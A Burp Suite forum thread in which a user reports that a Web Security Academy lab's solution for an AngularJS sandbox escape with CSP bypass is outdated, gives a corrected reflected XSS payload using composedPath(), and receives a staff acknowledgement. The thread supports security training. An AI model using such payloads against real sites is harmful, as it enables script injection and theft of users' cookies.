Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Wrong solution in WSA Expert lab XSS: Reflected XSS with AngularJS sandbox escape and CSP

Aetius | Last updated: Jan 19, 2023 09:42PM UTC

Hello, in the WSA Lab titled 'Reflected XSS with AngularJS sandbox escape and CSP', the solution section is wrong because it suggests this payload: location='https://YOUR-LAB-ID.web-security-academy.net/?search=%3Cinput%20id=x%20ng-focus=$event.path|orderBy:%27(z=alert)(document.cookie)%27%3E#x'; But as mentioned at the end of one of your publications (https://portswigger.net/research/angularjs-csp-bypass-in-56-characters) 'Since Chrome 109 the path property has been removed. The workaround is to use composedPath() instead.'. So the new solution is: location='https://YOUR-LAB-ID.web-security-academy.net/?search=%3Cinput%20id=x%20ng-focus=$event.composedPath()|orderBy:%27(z=alert)(document.cookie)%27%3E#x'; I tested both in my up-to-date Chrome browser and also in the lab: only the solution containing $event.composedPath() instead of $event.path works and validates the challenge so you should correct it in the writeup. Thank you for your amazing learning material!

Michelle, PortSwigger Agent | Last updated: Jan 20, 2023 02:46PM UTC

Thanks for getting in touch :) We'll pass this on to the team.

Aetius | Last updated: Jan 31, 2023 11:12AM UTC

Hi again, So were you able to fix the solution or was I wrong in some way ?

Michelle, PortSwigger Agent | Last updated: Jan 31, 2023 11:42AM UTC